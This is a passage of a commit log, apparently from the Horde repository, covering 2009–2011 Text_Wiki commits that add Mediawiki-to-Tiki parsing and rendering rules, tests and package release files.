    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 284003 c90b9560-bf6c-de11-be94-00142212c4b1

http://github.com/horde/horde/commit/7ff9f63988f64c83fe856123b959c3f933e2040a

-----------------------------------------------------------------------

commit 8cbc3c43800c996f4d57e371ecaf045e8108fe12
Author: Rodrigo Sampaio Primo 
Date:   Wed Jul 15 11:30:42 2009 +0000

    Text_Wiki tests now can run from any directory
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 284115 c90b9560-bf6c-de11-be94-00142212c4b1

 tests/Text_Wiki_Parse_Mediawiki_Tests.php |  2 +-
 tests/Text_Wiki_Tests.php                 | 16 ++++++++--------
 2 files changed, 9 insertions(+), 9 deletions(-)

http://github.com/horde/horde/commit/8cbc3c43800c996f4d57e371ecaf045e8108fe12

-----------------------------------------------------------------------

commit 1788975d7457bf3b4b0fd39ec6d7b691ac7ff8c2
Author: Rodrigo Sampaio Primo 
Date:   Wed Jul 15 13:43:22 2009 +0000

    Add Text_Wiki_Parse_Mediawiki_Redirect and Text_Wiki_Render_Tiki_Redirect
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 284119 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Mediawiki.php                   |  1 +
 Text/Wiki/Parse/Mediawiki/Redirect.php    | 77 +++++++++++++++++++++++++++
 Text/Wiki/Render/Tiki/Redirect.php        | 42 +++++++++++++++
 Text/Wiki/Tiki.php                        |  1 +
 tests/Text_Wiki_Parse_Mediawiki_Tests.php | 86 +++++++++++++++++++++++++++----
 tests/Text_Wiki_Render_Tiki_Tests.php     | 18 ++++++-
 tests/fixtures/mediawiki_syntax.txt       |  6 +++
 7 files changed, 221 insertions(+), 10 deletions(-)
 create mode 100644 Text/Wiki/Parse/Mediawiki/Redirect.php
 create mode 100644 Text/Wiki/Render/Tiki/Redirect.php

http://github.com/horde/horde/commit/1788975d7457bf3b4b0fd39ec6d7b691ac7ff8c2

-----------------------------------------------------------------------

commit 37fc223a25465683c155d39a5bd3af5ef8821b8c
Author: Rodrigo Sampaio Primo 
Date:   Wed Jul 15 15:53:35 2009 +0000

    Tests for the Mediawiki wikilink parser
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 284129 c90b9560-bf6c-de11-be94-00142212c4b1

 tests/Text_Wiki_Parse_Mediawiki_Tests.php          | 62 ++++++++++++++-
 tests/fixtures/mediawiki_syntax.txt                |  8 +-
 .../fixtures/mediawiki_syntax_to_test_wikilink.txt | 88 ++++++++++++++++++++++
 .../test_mediawiki_wikilink_expected_matches.php   | 70 +++++++++++++++++
 4 files changed, 222 insertions(+), 6 deletions(-)
 create mode 100644 tests/fixtures/mediawiki_syntax_to_test_wikilink.txt
 create mode 100644 tests/fixtures/test_mediawiki_wikilink_expected_matches.php

http://github.com/horde/horde/commit/37fc223a25465683c155d39a5bd3af5ef8821b8c

-----------------------------------------------------------------------

commit c8829c0cf298814bc7a53208746ca49e8e3e3757
Author: Rodrigo Sampaio Primo 
Date:   Thu Jul 16 11:52:10 2009 +0000

    Tests for the URL parser of Mediawiki
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 284183 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Mediawiki/Url.php         |  2 +
 tests/Text_Wiki_Parse_Mediawiki_Tests.php | 80 ++++++++++++++++++++++++++++++-
 tests/fixtures/mediawiki_syntax.txt       |  5 +-
 3 files changed, 83 insertions(+), 4 deletions(-)

http://github.com/horde/horde/commit/c8829c0cf298814bc7a53208746ca49e8e3e3757

-----------------------------------------------------------------------

commit 1507238252cdc3f0f6d83917d63cf2691a870f86
Author: Rodrigo Sampaio Primo 
Date:   Thu Jul 16 16:05:35 2009 +0000

    Tests for the rules raw, preformatted and emphasis of the Mediawiki parser
    Change to the raw rule regexp to consider optional line break before  and after 
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 284194 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Mediawiki/Raw.php                        |  2 +-
 tests/fixtures/mediawiki_syntax.txt                      |  3 +--
 tests/fixtures/mediawiki_syntax_to_test_preformatted.txt | 10 ++++++++++
 tests/fixtures/mediawiki_syntax_to_test_raw.txt          |  9 +++++++++
 4 files changed, 21 insertions(+), 3 deletions(-)
 create mode 100644 tests/fixtures/mediawiki_syntax_to_test_preformatted.txt
 create mode 100644 tests/fixtures/mediawiki_syntax_to_test_raw.txt

http://github.com/horde/horde/commit/1507238252cdc3f0f6d83917d63cf2691a870f86

-----------------------------------------------------------------------

commit 36fb2067ae28e91020a74f7c7bd94e2dbd5580d8
Author: Rodrigo Sampaio Primo 
Date:   Fri Jul 17 09:29:06 2009 +0000

    Tests for the rules raw, preformatted and emphasis of the Mediawiki
    parser (missing one file on the last commit)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 284245 c90b9560-bf6c-de11-be94-00142212c4b1

 tests/Text_Wiki_Parse_Mediawiki_Tests.php | 173 +++++++++++++++++++++++++++++-
 1 file changed, 168 insertions(+), 5 deletions(-)

http://github.com/horde/horde/commit/36fb2067ae28e91020a74f7c7bd94e2dbd5580d8

-----------------------------------------------------------------------

commit 61b3aaf9a3197d0ee0d294d89c6c7614419ff6dd
Author: Rodrigo Sampaio Primo 
Date:   Sun Jul 19 11:15:56 2009 +0000

    Starting tests for the Text_Wiki_Parse_Tiki
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 284349 c90b9560-bf6c-de11-be94-00142212c4b1

 tests/Text_Wiki_Parse_Tiki_Tests.php               | 134 +++++++++++++++++----
 .../test_tiki_heading_expected_matches.php         |  60 +++++++++
 .../fixtures/test_tiki_to_tiki_heading_source.txt  |  11 ++
 tests/fixtures/tiki_syntax.txt                     |  23 ++++
 tests/tests.php                                    |   9 +-
 5 files changed, 213 insertions(+), 24 deletions(-)
 create mode 100644 tests/fixtures/test_tiki_heading_expected_matches.php
 create mode 100644 tests/fixtures/test_tiki_to_tiki_heading_source.txt
 create mode 100644 tests/fixtures/tiki_syntax.txt

http://github.com/horde/horde/commit/61b3aaf9a3197d0ee0d294d89c6c7614419ff6dd

-----------------------------------------------------------------------

commit f36bc00ac5abbc5cc3ee821cba980911ff35cbec
Author: Rodrigo Sampaio Primo 
Date:   Tue Jul 21 10:02:26 2009 +0000

    just indentation (removing tabs and aligning)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 284482 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Mediawiki/Deflist.php | 77 ++++++++++++++++++-----------------
 1 file changed, 39 insertions(+), 38 deletions(-)

http://github.com/horde/horde/commit/f36bc00ac5abbc5cc3ee821cba980911ff35cbec

-----------------------------------------------------------------------

commit fbb87d0a3a65f7a9bd08e813816e39775f516e16
Author: Rodrigo Sampaio Primo 
Date:   Tue Jul 21 12:51:48 2009 +0000

    Fixing tiki render for deflist
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 284533 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Tiki/Deflist.php         | 14 ++++----
 tests/Text_Wiki_Parse_Mediawiki_Tests.php | 57 +++++++++++++++++++++++++++++--
 tests/Text_Wiki_Render_Tiki_Tests.php     | 10 +++---
 tests/fixtures/mediawiki_syntax.txt       |  3 ++
 4 files changed, 70 insertions(+), 14 deletions(-)

http://github.com/horde/horde/commit/fbb87d0a3a65f7a9bd08e813816e39775f516e16

-----------------------------------------------------------------------

commit 0a9fc18e96189a638b1056bfa0742bf0a3990169
Author: Rodrigo Sampaio Primo 
Date:   Tue Jul 21 13:13:40 2009 +0000

    Text_Wiki_Render_Tiki_Deflist now support definition list without definition narrative
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 284534 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Tiki/Deflist.php         | 28 +++++++++++++++++++++-------
 tests/Text_Wiki_Parse_Mediawiki_Tests.php |  4 +++-
 tests/Text_Wiki_Render_Tiki_Tests.php     |  7 +++++++
 tests/fixtures/mediawiki_syntax.txt       |  1 +
 4 files changed, 32 insertions(+), 8 deletions(-)

http://github.com/horde/horde/commit/0a9fc18e96189a638b1056bfa0742bf0a3990169

-----------------------------------------------------------------------

commit 00da254c00c81a4975f7e7fb80a731f1ad9300d0
Author: Rodrigo Sampaio Primo 
Date:   Tue Jul 21 14:28:40 2009 +0000

    Tests for mediawiki rule list parser
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 284539 c90b9560-bf6c-de11-be94-00142212c4b1

 tests/Text_Wiki_Parse_Mediawiki_Tests.php | 138 +++++++++++++++++++++++++++++-
 tests/fixtures/mediawiki_syntax.txt       |  16 ++++
 2 files changed, 152 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/00da254c00c81a4975f7e7fb80a731f1ad9300d0

-----------------------------------------------------------------------

commit 06d4dde993a74dc77a41b54514f97bc8deeef1b0
Author: Rodrigo Sampaio Primo 
Date:   Tue Jul 21 14:29:13 2009 +0000

    Mediawiki rule list does not consider redirect rule as list
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 284540 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Mediawiki/List.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/06d4dde993a74dc77a41b54514f97bc8deeef1b0

-----------------------------------------------------------------------

commit 152ebb61aa7bde1529234a327ad89fe02a87eeba
Author: Rodrigo Sampaio Primo 
Date:   Wed Jul 22 15:03:27 2009 +0000

    changed the fixture for testing the parser of mediawiki list
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 284608 c90b9560-bf6c-de11-be94-00142212c4b1

 tests/Text_Wiki_Parse_Mediawiki_Tests.php | 108 +++++++++++++++---------------
 tests/fixtures/mediawiki_syntax.txt       |  21 +++---
 2 files changed, 63 insertions(+), 66 deletions(-)

http://github.com/horde/horde/commit/152ebb61aa7bde1529234a327ad89fe02a87eeba

-----------------------------------------------------------------------

commit ea1805d2bbf1ea79b1db4eda533cd2db7e79f25c
Author: Rodrigo Sampaio Primo 
Date:   Fri Jul 24 00:11:28 2009 +0000

    Bug #16455 - proper parsing of Mediawiki bold and italic (using algorithm from Mediawiki parser)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 284672 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Mediawiki.php                   |   4 +-
 Text/Wiki/Parse/Mediawiki/Emphasis.php    | 240 ++++++++++++++++++++++++++----
 tests/Text_Wiki_Parse_Mediawiki_Tests.php | 116 ++++++++-------
 tests/fixtures/mediawiki_syntax.txt       |  10 ++
 4 files changed, 285 insertions(+), 85 deletions(-)

http://github.com/horde/horde/commit/ea1805d2bbf1ea79b1db4eda533cd2db7e79f25c

-----------------------------------------------------------------------

commit 72de0aef63bc577a4c4a44c1f5b955654ec1e5ab
Author: Rodrigo Sampaio Primo 
Date:   Fri Jul 24 15:10:20 2009 +0000

    Proper Mediawiki parsing and Tiki rendering for heading (fix problem with linebreaks)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 284705 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Mediawiki/Heading.php     | 2 +-
 Text/Wiki/Render/Tiki/Heading.php         | 4 ++--
 tests/Text_Wiki_Parse_Mediawiki_Tests.php | 8 ++++----
 tests/Text_Wiki_Render_Tiki_Tests.php     | 6 +++---
 4 files changed, 10 insertions(+), 10 deletions(-)

http://github.com/horde/horde/commit/72de0aef63bc577a4c4a44c1f5b955654ec1e5ab

-----------------------------------------------------------------------

commit a8ce2573b036d8c3dc83ba63ce8ee10b6a169ab0
Author: Rodrigo Sampaio Primo 
Date:   Fri Jul 24 15:30:10 2009 +0000

    Adding new line at the end of Tiki list rendering
    Generic test using Text_Wiki::transform() to convert from Mediawiki syntax to Tiki
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 284706 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Tiki/List.php                   | 10 +++--
 tests/Text_Wiki_Generic_Transform_Tests.php      | 21 +++++++++
 tests/Text_Wiki_Render_Tiki_Tests.php            | 14 +++++-
 tests/fixtures/test_mediawiki_to_tiki_output.txt | 56 +++++++++++++++++++++++
 tests/fixtures/test_mediawiki_to_tiki_source.txt | 57 ++++++++++++++++++++++++
 tests/tests.php                                  |  4 +-
 6 files changed, 156 insertions(+), 6 deletions(-)
 create mode 100644 tests/Text_Wiki_Generic_Transform_Tests.php
 create mode 100644 tests/fixtures/test_mediawiki_to_tiki_output.txt
 create mode 100644 tests/fixtures/test_mediawiki_to_tiki_source.txt

http://github.com/horde/horde/commit/a8ce2573b036d8c3dc83ba63ce8ee10b6a169ab0

-----------------------------------------------------------------------

commit f92cd76ad135d86b62682ff2bc524768dc11cf8f
Author: Rodrigo Sampaio Primo 
Date:   Sun Aug 2 12:09:44 2009 +0000

    Add prefix option for the configuration of the Tiki Image Render
    Tests for the basic syntax of Mediawiki Table Parser
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 286660 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Tiki/Image.php           | 17 ++++++-
 tests/Text_Wiki_Parse_Mediawiki_Tests.php | 79 +++++++++++++++++++++++++++++--
 tests/Text_Wiki_Render_Tiki_Tests.php     | 10 ++--
 tests/fixtures/mediawiki_syntax.txt       |  8 ++++
 4 files changed, 106 insertions(+), 8 deletions(-)

http://github.com/horde/horde/commit/f92cd76ad135d86b62682ff2bc524768dc11cf8f

-----------------------------------------------------------------------

commit 3c1750a239ab7b6152c278e45b5a7c0e71c2cdda
Author: Rodrigo Sampaio Primo 
Date:   Tue Aug 4 15:25:26 2009 +0000

    Improve Text_Wiki_Render_Tiki_List
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 286811 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Tiki/List.php                   | 20 +++++++------
 tests/Text_Wiki_Render_Tiki_Tests.php            | 37 ++++++++++++++----------
 tests/fixtures/test_mediawiki_to_tiki_output.txt |  4 ---
 3 files changed, 33 insertions(+), 28 deletions(-)

http://github.com/horde/horde/commit/3c1750a239ab7b6152c278e45b5a7c0e71c2cdda

-----------------------------------------------------------------------

commit baac2bc8ffde15e14ff822e0cbcea02ddc4b71fc
Author: Rodrigo Sampaio Primo 
Date:   Tue Aug 4 17:03:17 2009 +0000

    Another tentative to fix heading parsing and heading from Mediawiki to Tiki
    More unit tests for lists
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 286814 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Default/Paragraph.php              | 72 +++++++---------------
 Text/Wiki/Parse/Mediawiki/Newline.php              |  2 +-
 Text/Wiki/Render/Tiki/Newline.php                  |  3 +-
 tests/Text_Wiki_Generic_Transform_Tests.php        |  9 +++
 .../test_mediawiki_to_tiki_lists_output.txt        | 17 +++++
 .../test_mediawiki_to_tiki_lists_source.txt        | 18 ++++++
 tests/fixtures/test_mediawiki_to_tiki_output.txt   |  2 +-
 tests/fixtures/test_mediawiki_to_tiki_source.txt   |  1 +
 8 files changed, 69 insertions(+), 55 deletions(-)
 create mode 100644 tests/fixtures/test_mediawiki_to_tiki_lists_output.txt
 create mode 100644 tests/fixtures/test_mediawiki_to_tiki_lists_source.txt

http://github.com/horde/horde/commit/baac2bc8ffde15e14ff822e0cbcea02ddc4b71fc

-----------------------------------------------------------------------

commit be8a37697ec5c3f2de55e15df49f9a81e3aea232
Author: Rodrigo Sampaio Primo 
Date:   Thu Aug 6 09:26:05 2009 +0000

    Converting Text_Wiki_Tiki and Text_Wiki_Mediawiki to 2.0 of package.xml
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 286872 c90b9560-bf6c-de11-be94-00142212c4b1

 packageMediawiki.xml | 162 +++++++++++++++++++-------------
 packageTiki.xml      | 255 +++++++++++++++++++++++++++++----------------------
 2 files changed, 241 insertions(+), 176 deletions(-)

http://github.com/horde/horde/commit/be8a37697ec5c3f2de55e15df49f9a81e3aea232

-----------------------------------------------------------------------

commit 679095cf3c030d34ececcedf621941c1982c0828
Author: Rodrigo Sampaio Primo 
Date:   Thu Aug 6 09:39:56 2009 +0000

    Updating the list of Text_Wiki_Mediawiki files on the XML and adding myself as one of the developers
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 286873 c90b9560-bf6c-de11-be94-00142212c4b1

 packageMediawiki.xml | 15 +++++++++++++++
 1 file changed, 15 insertions(+)

http://github.com/horde/horde/commit/679095cf3c030d34ececcedf621941c1982c0828

-----------------------------------------------------------------------

commit f9bacbbdf3de5742dabd1da837a2a950c2e0b9a1
Author: Rodrigo Sampaio Primo 
Date:   Thu Aug 6 09:45:38 2009 +0000

    Updating the list of Text_Wiki_Tiki files on the XML and adding myself as one of the developers
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 286875 c90b9560-bf6c-de11-be94-00142212c4b1

 packageTiki.xml | 8 ++++++++
 1 file changed, 8 insertions(+)

http://github.com/horde/horde/commit/f9bacbbdf3de5742dabd1da837a2a950c2e0b9a1

-----------------------------------------------------------------------

commit 14130b07bf80b8c870d4759cf8bea6309560afe8
Author: Rodrigo Sampaio Primo 
Date:   Fri Aug 7 14:58:07 2009 +0000

    Removing obsolete test file
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 286910 c90b9560-bf6c-de11-be94-00142212c4b1

 tests/Tiki_Render_Url.phpt | 22 ----------------------
 1 file changed, 22 deletions(-)
 delete mode 100644 tests/Tiki_Render_Url.phpt

http://github.com/horde/horde/commit/14130b07bf80b8c870d4759cf8bea6309560afe8

-----------------------------------------------------------------------

commit c7963d959efe6a9b484b9a11603c4f65676e6f23
Author: Rodrigo Sampaio Primo 
Date:   Fri Aug 7 14:59:45 2009 +0000

    Removing unused file
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 286911 c90b9560-bf6c-de11-be94-00142212c4b1

 tests/mediawiki_syntax.txt | 79 ----------------------------------------------
 1 file changed, 79 deletions(-)
 delete mode 100644 tests/mediawiki_syntax.txt

http://github.com/horde/horde/commit/c7963d959efe6a9b484b9a11603c4f65676e6f23

-----------------------------------------------------------------------

commit e52f83a0bf93f43d128953d7ec7809a3259de4f5
Author: Rodrigo Sampaio Primo 
Date:   Fri Aug 7 15:03:08 2009 +0000

    Using a simplified syntax for rendering Tiki redirect
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 286912 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Tiki/Redirect.php    | 2 +-
 tests/Text_Wiki_Render_Tiki_Tests.php | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/e52f83a0bf93f43d128953d7ec7809a3259de4f5

-----------------------------------------------------------------------

commit 046cfbd5a97632ca208a2a71d56f4b46bf5aa797
Author: Rodrigo Sampaio Primo 
Date:   Mon Aug 10 11:42:57 2009 +0000

    Preparing new release of Text_Wiki_Tiki and Text_Wiki_Mediawiki
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 287034 c90b9560-bf6c-de11-be94-00142212c4b1

 packageMediawiki.xml | 88 ++++++++++++++++++++++++++++++----------------------
 packageTiki.xml      | 33 +++++++++++++++++---
 2 files changed, 80 insertions(+), 41 deletions(-)

http://github.com/horde/horde/commit/046cfbd5a97632ca208a2a71d56f4b46bf5aa797

-----------------------------------------------------------------------

commit 8a5540c4ec477e3bdd59749ad7c7b88e38d37574
Author: Justin Patrin 
Date:   Wed Jan 20 18:48:09 2010 +0000

    Bug #15758 Add # as a possibility for the last char in a URL
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 293784 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Cowiki/Url.php    | 2 +-
 Text/Wiki/Parse/Creole/Url.php    | 2 +-
 Text/Wiki/Parse/Default/Url.php   | 2 +-
 Text/Wiki/Parse/Doku/Url.php      | 2 +-
 Text/Wiki/Parse/Mediawiki/Url.php | 2 +-
 Text/Wiki/Parse/Tiki/Url.php      | 2 +-
 6 files changed, 6 insertions(+), 6 deletions(-)

http://github.com/horde/horde/commit/8a5540c4ec477e3bdd59749ad7c7b88e38d37574

-----------------------------------------------------------------------

commit 573b8f3b54c04946c78d5846c4bde2410887e3f9
Author: Daniel O'Connor 
Date:   Mon Oct 25 08:59:23 2010 +0000

    QA release prep
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 304732 c90b9560-bf6c-de11-be94-00142212c4b1

 package.xml       | 43 +++++++++++--------------------------------
 packageCreole.xml | 10 +++++-----
 2 files changed, 16 insertions(+), 37 deletions(-)

http://github.com/horde/horde/commit/573b8f3b54c04946c78d5846c4bde2410887e3f9

-----------------------------------------------------------------------

commit c86c0084483bd29b8f04d11242f23a9d1b711751
Author: Daniel O'Connor 
Date:   Mon Oct 25 09:01:49 2010 +0000

    1.0.2
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 304733 c90b9560-bf6c-de11-be94-00142212c4b1

 packageCreole.xml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/c86c0084483bd29b8f04d11242f23a9d1b711751

-----------------------------------------------------------------------

commit 61de383bd8b2ae13871c043ff8ea699fad399446
Author: Rodrigo Sampaio Primo 
Date:   Tue Nov 2 17:44:23 2010 +0000

    Just avoiding undefined offset notice on Mediawiki wikilink parser
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 305031 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Mediawiki/Wikilink.php | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

http://github.com/horde/horde/commit/61de383bd8b2ae13871c043ff8ea699fad399446

-----------------------------------------------------------------------

commit 08f4ffcb3fad8b6643970fa93f6b2090361f539e
Author: Rodrigo Sampaio Primo 
Date:   Wed Nov 3 14:26:32 2010 +0000

    Just avoiding generation of php undefined index, offset or variable notices
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 305056 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki.php                       | 6 +++---
 Text/Wiki/Render/Tiki/Code.php      | 2 +-
 Text/Wiki/Render/Tiki/Colortext.php | 2 +-
 Text/Wiki/Render/Tiki/Image.php     | 2 +-
 Text/Wiki/Render/Tiki/Table.php     | 2 +-
 Text/Wiki/Render/Tiki/Url.php       | 8 ++++----
 Text/Wiki/Render/Tiki/Wikilink.php  | 6 +++---
 7 files changed, 14 insertions(+), 14 deletions(-)

http://github.com/horde/horde/commit/08f4ffcb3fad8b6643970fa93f6b2090361f539e

-----------------------------------------------------------------------

commit 0418890081e49e2d21ef21432aaf222a680824c1
Author: Rodrigo Sampaio Primo 
Date:   Wed Dec 1 11:44:04 2010 +0000

    update Text_Wiki_Render_Tiki_Redirect to use new Tiki redirect syntax
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 305882 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Tiki/Redirect.php          | 4 ++--
 tests/Text_Wiki_Generic_Transform_Tests.php | 9 +++++++++
 tests/Text_Wiki_Render_Tiki_Tests.php       | 4 ++--
 3 files changed, 13 insertions(+), 4 deletions(-)

http://github.com/horde/horde/commit/0418890081e49e2d21ef21432aaf222a680824c1

-----------------------------------------------------------------------

commit 5c24b704f82ff4312ee7c43a5286cbe4117d1349
Author: Rodrigo Sampaio Primo 
Date:   Wed Dec 1 11:44:43 2010 +0000

    adding missing files from previous commit
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 305883 c90b9560-bf6c-de11-be94-00142212c4b1

 tests/fixtures/test_mediawiki_to_tiki_redirect_output.txt | 3 +++
 tests/fixtures/test_mediawiki_to_tiki_redirect_source.txt | 2 ++
 2 files changed, 5 insertions(+)
 create mode 100644 tests/fixtures/test_mediawiki_to_tiki_redirect_output.txt
 create mode 100644 tests/fixtures/test_mediawiki_to_tiki_redirect_source.txt

http://github.com/horde/horde/commit/5c24b704f82ff4312ee7c43a5286cbe4117d1349

-----------------------------------------------------------------------

commit b5b0f431d6e059eb40b1596250c787140428e016
Author: Till Klampaeckel 
Date:   Sat Mar 19 18:23:13 2011 +0000

     * tests.php >> AllTests.php to follow PEAR convention
     * kill E_NOTICE: remove include to PHPUnit/Framework.php
    
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 309440 c90b9560-bf6c-de11-be94-00142212c4b1

 tests/AllTests.php                          | 33 +++++++++++++++++++++++++++
 tests/Text_Wiki_Generic_Transform_Tests.php |  2 +-
 tests/Text_Wiki_Parse_Mediawiki_Tests.php   |  2 +-
 tests/Text_Wiki_Parse_Tiki_Tests.php        |  2 +-
 tests/Text_Wiki_Render_Tests.php            |  4 ++--
 tests/Text_Wiki_Render_Tiki_Tests.php       |  2 +-
 tests/Text_Wiki_Tests.php                   |  2 +-
 tests/tests.php                             | 35 -----------------------------
 8 files changed, 40 insertions(+), 42 deletions(-)
 create mode 100644 tests/AllTests.php
 delete mode 100644 tests/tests.php

http://github.com/horde/horde/commit/b5b0f431d6e059eb40b1596250c787140428e016

-----------------------------------------------------------------------

commit b40867b1b2e7f6cc8ec70cbafff84f0cef2755e1
Author: Till Klampaeckel 
Date:   Sat Mar 19 18:34:24 2011 +0000

    cs
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 309442 c90b9560-bf6c-de11-be94-00142212c4b1

 tests/skipif.php | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

http://github.com/horde/horde/commit/b40867b1b2e7f6cc8ec70cbafff84f0cef2755e1

-----------------------------------------------------------------------

commit 108c54e627c2a5f48d26d4d4f3ff6cb8077abceb
Author: Till Klampaeckel 
Date:   Sat Mar 19 18:34:56 2011 +0000

     * include config.php (if available) allows us to run 'phpunit AllTests.php' as well
    
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 309443 c90b9560-bf6c-de11-be94-00142212c4b1

 tests/AllTests.php | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

http://github.com/horde/horde/commit/108c54e627c2a5f48d26d4d4f3ff6cb8077abceb

-----------------------------------------------------------------------

commit da8d739b273f2275df1810ff99bad7d7cb96637a
Author: Till Klampaeckel 
Date:   Sat Mar 19 18:35:23 2011 +0000

    whitespace foo
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 309444 c90b9560-bf6c-de11-be94-00142212c4b1

 tests/Text_Wiki_Generic_Transform_Tests.php | 5 +----
 tests/Text_Wiki_Tests.php                   | 1 -
 2 files changed, 1 insertion(+), 5 deletions(-)

http://github.com/horde/horde/commit/da8d739b273f2275df1810ff99bad7d7cb96637a

-----------------------------------------------------------------------

commit 7691fbf84690ae2dcbcbb96d6e1d40f29b8f07e4
Author: Till Klampaeckel 
Date:   Sat Mar 19 18:42:20 2011 +0000

     * add testcase for bugs, #18289
    
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 309445 c90b9560-bf6c-de11-be94-00142212c4b1

 tests/Text_Wiki_BugTests.php | 31 +++++++++++++++++++++++++++++++
 1 file changed, 31 insertions(+)
 create mode 100644 tests/Text_Wiki_BugTests.php

http://github.com/horde/horde/commit/7691fbf84690ae2dcbcbb96d6e1d40f29b8f07e4

-----------------------------------------------------------------------

commit a722380f4c051fc098fd57ec36929e67cb38e1e2
Author: Till Klampaeckel 
Date:   Sat Mar 19 18:58:28 2011 +0000

     * test seems to work standalone only
     * switched to factory(), apparently __construct is deprecated
    
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 309446 c90b9560-bf6c-de11-be94-00142212c4b1

 tests/Text_Wiki_BugTests.php | 27 +++++++++++++++++++--------
 1 file changed, 19 insertions(+), 8 deletions(-)

http://github.com/horde/horde/commit/a722380f4c051fc098fd57ec36929e67cb38e1e2

-----------------------------------------------------------------------

commit c6587d99e881411dc7336268b73bcc130cc7e408
Author: Till Klampaeckel 
Date:   Sat Mar 19 18:59:15 2011 +0000

     * added __construct() for PHP5
    
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 309447 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki.php | 21 ++++++++++++++++++---
 1 file changed, 18 insertions(+), 3 deletions(-)

http://github.com/horde/horde/commit/c6587d99e881411dc7336268b73bcc130cc7e408

-----------------------------------------------------------------------

commit 3e4f57794bc666e9c9a16c468f94180312e2c012
Author: Till Klampaeckel 
Date:   Sat Mar 19 18:59:48 2011 +0000

     * applied patch from #18289, thanks yunosh
    
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 309448 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Default/List.php | 4 ++--
